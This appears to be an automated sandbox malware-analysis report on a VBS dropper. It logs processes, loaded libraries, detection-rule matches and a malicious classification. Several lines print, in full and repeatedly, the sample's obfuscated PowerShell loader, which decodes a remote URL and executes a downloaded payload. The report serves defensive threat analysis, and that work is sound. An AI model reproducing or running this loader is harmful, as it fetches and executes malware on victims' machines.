Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 2439B970 appears 221 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 243F7E54 appears 80 times

Source: 10145202485.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5962
Source: unknown	Process created: Commandline size = 5962
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5962	Jump to behavior

Source: amsi32_8040.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8040, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@17/8@5/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Stderes.Ide

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihwfgtvw.nk2.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7816
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8040

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 10145202485.vbs

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDi
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
